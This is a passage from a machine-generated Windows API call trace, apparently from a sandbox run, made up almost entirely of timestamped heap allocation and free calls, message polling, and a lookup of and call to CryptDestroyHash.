hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.753] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.754] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.754] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.754] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.754] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0254.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.756] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.756] CryptDestroyHash (hHash=0xaa5760) returned 1 [0254.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0254.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 